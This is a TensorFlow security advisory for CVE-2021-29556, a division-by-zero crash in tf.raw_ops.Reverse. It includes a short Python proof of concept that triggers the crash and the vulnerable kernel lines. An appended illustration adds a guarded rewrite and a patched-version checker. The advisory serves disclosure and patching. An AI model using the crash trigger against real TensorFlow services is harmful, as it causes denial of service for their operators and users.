## TFSA-2021-045: Division by 0 in `Reverse`

### CVE Number
CVE-2021-29556

### Impact
An attacker can cause a denial of service via an FPE runtime error in
`tf.raw_ops.Reverse`:

```python
import tensorflow as tf

# A tensor whose first dimension is 0: the kernel's N becomes 0.
tensor_input = tf.constant([], shape=[0, 1, 1], dtype=tf.int32)
dims = tf.constant([False, True, False], shape=[3], dtype=tf.bool)

tf.raw_ops.Reverse(tensor=tensor_input, dims=dims)
```

This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/36229ea9e9451dac14a8b1f4711c435a1d84a594/tensorflow/core/kernels/reverse_op.cc#L75-L76)
performs a division based on the first dimension of the tensor argument:

```cc
const int64 N = input.dim_size(0);
const int64 cost_per_unit = input.NumElements() / N;
```

Since this is controlled by the user, an attacker can trigger a denial of
service.

### Patches
We have patched the issue in GitHub commit
[4071d8e2f6c45c1955a811fee757ca2adbe462c1](https://github.com/tensorflow/tensorflow/commit/4071d8e2f6c45c1955a811fee757ca2adbe462c1).

The fix will be included in TensorFlow 2.5.0. We will also cherry-pick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.

### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.

### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu
X-Team.
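As an added illustration of the Impact section above (example code, not TensorFlow's own): the quoted cost computation rewritten in Python beside a guarded form that returns early for an empty first dimension, plus a helper that checks an installed TensorFlow version against the fixed releases listed under Patches. The function names and the treatment of pre-release tags as older than the final release are assumptions.

```python
"""Added example for TFSA-2021-045; not TensorFlow's own code."""
from math import prod


def cost_per_unit_unguarded(shape):
    """Mirrors the kernel lines quoted above: N = dim_size(0), NumElements() / N.

    A shape like [0, 1, 1] makes N == 0; in C++ that is an FPE, here a
    ZeroDivisionError."""
    n = shape[0]
    return prod(shape) // n


def cost_per_unit_guarded(shape):
    """Hardened form: an empty tensor has no elements to reverse, so report
    zero cost instead of dividing by a zero-length first dimension."""
    if not shape or prod(shape) == 0:
        return 0
    return prod(shape) // shape[0]


# First release on each minor line that carries the fix, per the Patches
# section. The trailing 1 marks a final release (0 would be a pre-release).
FIXED = {
    (2, 5): (2, 5, 0, 1),
    (2, 4): (2, 4, 2, 1),
    (2, 3): (2, 3, 3, 1),
    (2, 2): (2, 2, 3, 1),
    (2, 1): (2, 1, 4, 1),
}


def parse_version(text):
    """'2.4.1' -> (2, 4, 1, 1); '2.5.0-rc0' -> (2, 5, 0, 0) (assumption:
    any '-' or '+' suffix is treated as a pre-release of that number)."""
    core = text.split("-")[0].split("+")[0]
    parts = [int(p) for p in core.split(".")[:3]]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts) + ((0 if len(core) != len(text) else 1),)


def is_patched(version):
    """True if this TensorFlow version includes the fix for CVE-2021-29556."""
    v = parse_version(version)
    line = v[:2]
    if line in FIXED:
        return v >= FIXED[line]
    # Minor lines newer than 2.5 inherit the fix; lines older than 2.1
    # received no backport in this advisory, so treat them as unpatched.
    return line > (2, 5)
```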